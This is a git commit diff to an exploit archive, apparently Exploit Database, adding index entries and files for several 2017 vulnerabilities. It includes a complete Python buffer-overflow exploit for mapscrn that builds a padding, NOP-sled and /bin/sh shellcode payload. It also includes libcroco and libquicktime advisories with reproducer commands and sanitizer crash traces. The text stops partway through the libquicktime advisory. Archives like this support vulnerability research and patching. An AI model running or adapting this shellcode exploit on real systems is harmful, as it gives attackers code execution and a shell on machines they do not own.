DB: 2017-06-10
6 new exploits Mapscrn 2.03 - Local Buffer Overflow libcroco 0.6.12 - Denial of Service libquicktime 1.2.4 - Denial of Service Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition Apple macOS - Disk Arbitration Daemon Race Condition Craft CMS 2.6 - Cross-Site Scripting
This commit is contained in:
parent
bed1811f1d
commit
fbe517f675
7 changed files with 935 additions and 0 deletions
|
@ -5536,6 +5536,9 @@ id,file,description,date,author,platform,type,port
|
|||
42138,platforms/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",linux,dos,0
|
||||
42139,platforms/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",linux,dos,0
|
||||
42140,platforms/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",windows,dos,0
|
||||
42144,platforms/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",linux,dos,0
|
||||
42147,platforms/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
|
||||
42148,platforms/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -9039,6 +9042,8 @@ id,file,description,date,author,platform,type,port
|
|||
42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0
|
||||
42141,platforms/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",windows,local,0
|
||||
42142,platforms/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local,0
|
||||
42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
|
||||
42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -37972,3 +37977,4 @@ id,file,description,date,author,platform,type,port
|
|||
42131,platforms/php/webapps/42131.txt,"Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting",2017-06-07,"Ahsan Tahir",php,webapps,0
|
||||
42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0
|
||||
42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
|
||||
42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
59
platforms/linux/dos/42144.py
Executable file
59
platforms/linux/dos/42144.py
Executable file
|
@ -0,0 +1,59 @@
|
|||
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
|
||||
# Tested on: GNU/Linux - Kali 2017.1 Release
|
||||
#
|
||||
# Description: Mapscrn ( Part of setfont ) 2.0.3
|
||||
# The mapscrn command loads a user defined output character mapping table into the console driver.
|
||||
# The console driver may be later put into use user-defined mapping table mode by outputting a special
|
||||
# escape sequence to the console device.
|
||||
#
|
||||
# An attacker could exploit this vulnerability to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in a
|
||||
# denial-of-service condition.
|
||||
#
|
||||
# Architecture: all
|
||||
#
|
||||
# Vendor homepage: http://ccross.msk.su
|
||||
#
|
||||
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
|
||||
# at 0x4831518: strcpy (vg_replace_strmem.c:506)
|
||||
# by 0x10A71F: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x10933B: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x41414140: ???
|
||||
#
|
||||
# Invalid read of size 2
|
||||
# at 0x488DFCA: getenv (getenv.c:84)
|
||||
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
|
||||
# by 0x48867AE: __dcigettext (dcigettext.c:667)
|
||||
# by 0x48855F5: dcgettext (dcgettext.c:47)
|
||||
# by 0x109733: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x41414140: ???
|
||||
# Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
|
||||
#
|
||||
# Process terminating with default action of signal 11 (SIGSEGV)
|
||||
# Access not within mapped region at address 0x41414141
|
||||
# at 0x488DFCA: getenv (getenv.c:84)
|
||||
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
|
||||
# by 0x48867AE: __dcigettext (dcigettext.c:667)
|
||||
# by 0x48855F5: dcgettext (dcgettext.c:47)
|
||||
# by 0x109733: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x41414140: ???
|
||||
|
||||
|
||||
import os,subprocess
|
||||
|
||||
junk = "\x41" * 4880 # junk to offset
|
||||
nops = "\x90" * 24 # nops
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
esp = "\xe0\xdf\xff\xbf" # Must be changed
|
||||
buffer = junk + esp + nops + shellcode # Craft the buffer
|
||||
|
||||
try:
|
||||
print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
|
||||
print("[*] Please wait.. running")
|
||||
subprocess.call(["mapscrn", buffer])
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "Mapscrn not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
69
platforms/linux/dos/42147.txt
Executable file
69
platforms/linux/dos/42147.txt
Executable file
|
@ -0,0 +1,69 @@
|
|||
libcroco multiple vulnerabilities
|
||||
================
|
||||
Author : qflb.wu
|
||||
===============
|
||||
|
||||
|
||||
Introduction:
|
||||
=============
|
||||
Libcroco is a standalone css2 parsing and manipulation library.
|
||||
The parser provides a low level event driven SAC like api and a css object model like api.
|
||||
Libcroco provides a CSS2 selection engine and an experimental xml/css rendering engine.
|
||||
|
||||
|
||||
Affected version:
|
||||
=====
|
||||
0.6.12
|
||||
|
||||
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
1.
|
||||
the cr_tknzr_parse_comment function in cr-tknzr.c in libcroco 0.6.12 can cause a denial of service (memory allocation error) via a crafted CSS file.
|
||||
|
||||
|
||||
./csslint-0.6 --dump-location libcroco_0_6_12_memory_allocation_error.css
|
||||
|
||||
|
||||
==21841==ERROR: AddressSanitizer failed to allocate 0x20002000 (536879104) bytes of LargeMmapAllocator: 12
|
||||
...
|
||||
==21841==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
|
||||
...
|
||||
#10 0x7fd78c2fcb4d in cr_tknzr_parse_comment /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:462
|
||||
#11 0x7fd78c2fcb4d in cr_tknzr_get_next_token /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:2218
|
||||
#12 0x7fd78c356f6e in cr_parser_try_to_skip_spaces_and_comments /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:634
|
||||
#13 0x7fd78c368a43 in cr_parser_parse_stylesheet /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:2538
|
||||
#14 0x7fd78c368a43 in cr_parser_parse /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:4381
|
||||
#15 0x480a8e in sac_parse_and_display_locations /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:960
|
||||
#16 0x480a8e in main /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:1001
|
||||
#17 0x7fd78b397f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
|
||||
#18 0x47c95c in _start (/home/a/Downloads/libcroco-0.6.12/csslint/.libs/lt-csslint-0.6+0x47c95c)
|
||||
|
||||
|
||||
Reproducer:
|
||||
libcroco_0_6_12_memory_allocation_error.css
|
||||
CVE:
|
||||
CVE-2017-8834
|
||||
|
||||
|
||||
2.
|
||||
The cr_parser_parse_selector_core function in cr-parser.c in libcroco 0.6.12 can cause a denial of service(infinite loop and CPU consumption) via a crafted CSS file.
|
||||
|
||||
|
||||
./csslint-0.6 --dump-location libcroco_0_6_12_infinite_loop.css
|
||||
|
||||
|
||||
Reproducer:
|
||||
libcroco_0_6_12_infinite_loop.css
|
||||
CVE:
|
||||
CVE-2017-8871
|
||||
|
||||
|
||||
===============================
|
||||
|
||||
|
||||
qflb.wu () dbappsecurity com cn
|
||||
|
||||
|
||||
Proofs of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42147.zip
|
397
platforms/linux/dos/42148.txt
Executable file
397
platforms/linux/dos/42148.txt
Executable file
|
@ -0,0 +1,397 @@
|
|||
libquicktime multiple vulnerabilities
|
||||
|
||||
|
||||
================
|
||||
Author : qflb.wu
|
||||
===============
|
||||
|
||||
|
||||
Introduction:
|
||||
=============
|
||||
The libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.
|
||||
|
||||
|
||||
Affected version:
|
||||
=====
|
||||
1.2.4
|
||||
|
||||
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
##################################
|
||||
1.
|
||||
the quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
|
||||
CVE:
|
||||
CVE-2017-9122
|
||||
|
||||
|
||||
###################################
|
||||
2.
|
||||
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
|
||||
|
||||
|
||||
ASAN:SIGSEGV
|
||||
=================================================================
|
||||
==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)
|
||||
==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
|
||||
#0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)
|
||||
#1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)
|
||||
#2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)
|
||||
#3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
AddressSanitizer can not provide additional info.
|
||||
SUMMARY: AddressSanitizer: SEGV ??:0 ??
|
||||
==14254==ABORTING
|
||||
|
||||
|
||||
debug info:
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
...
|
||||
Stopped reason: SIGSEGV
|
||||
0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>,
|
||||
constant=<optimized out>) at lqt_quicktime.c:1242
|
||||
1242 return
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
|
||||
CVE:
|
||||
CVE-2017-9123
|
||||
|
||||
|
||||
###################################
|
||||
3.
|
||||
the quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
|
||||
|
||||
|
||||
ASAN:SIGSEGV
|
||||
=================================================================
|
||||
==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)
|
||||
==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
|
||||
#0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)
|
||||
#1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)
|
||||
#2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)
|
||||
#3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)
|
||||
#4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)
|
||||
#5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)
|
||||
#6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)
|
||||
#7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
AddressSanitizer can not provide additional info.
|
||||
SUMMARY: AddressSanitizer: SEGV ??:0 ??
|
||||
==14359==ABORTING
|
||||
|
||||
|
||||
debug info:
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
Stopped reason: SIGSEGV
|
||||
0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>,
|
||||
_output=<optimized out>) at util.c:874
|
||||
874if(input[0] == output[0] &&
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
|
||||
CVE:
|
||||
CVE-2017-9124
|
||||
|
||||
|
||||
###################################
|
||||
4.
|
||||
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528
|
||||
READ of size 4 at 0x602000009cd4 thread T0
|
||||
#0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242
|
||||
#1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138
|
||||
#2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996
|
||||
#3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa
|
||||
0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
|
||||
0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa
|
||||
0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01
|
||||
0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa
|
||||
=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04
|
||||
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==40038==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9125
|
||||
|
||||
|
||||
###################################
|
||||
5.
|
||||
the quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718
|
||||
WRITE of size 1 at 0x602000009ce4 thread T0
|
||||
#0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69
|
||||
#1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147
|
||||
#2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56
|
||||
#3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220
|
||||
#4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
|
||||
#5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
|
||||
#6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
|
||||
#7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
|
||||
#8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
|
||||
#9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
|
||||
#10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
|
||||
#11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa
|
||||
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==41637==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9126
|
||||
|
||||
|
||||
###################################
|
||||
6.
|
||||
the quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8
|
||||
WRITE of size 1 at 0x602000009cb1 thread T0
|
||||
#0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84
|
||||
#1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557
|
||||
#2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694
|
||||
#3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336
|
||||
#4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231
|
||||
#5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
|
||||
#6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
|
||||
#7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
|
||||
#8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
|
||||
#9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
|
||||
#10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
|
||||
#11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
|
||||
#12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04
|
||||
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==41642==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9127
|
||||
|
||||
|
||||
###################################
|
||||
7.
|
||||
the quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008
|
||||
READ of size 4 at 0x602000009d00 thread T0
|
||||
#0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998
|
||||
#1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633
|
||||
#2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891
|
||||
#3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
|
||||
#4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
|
||||
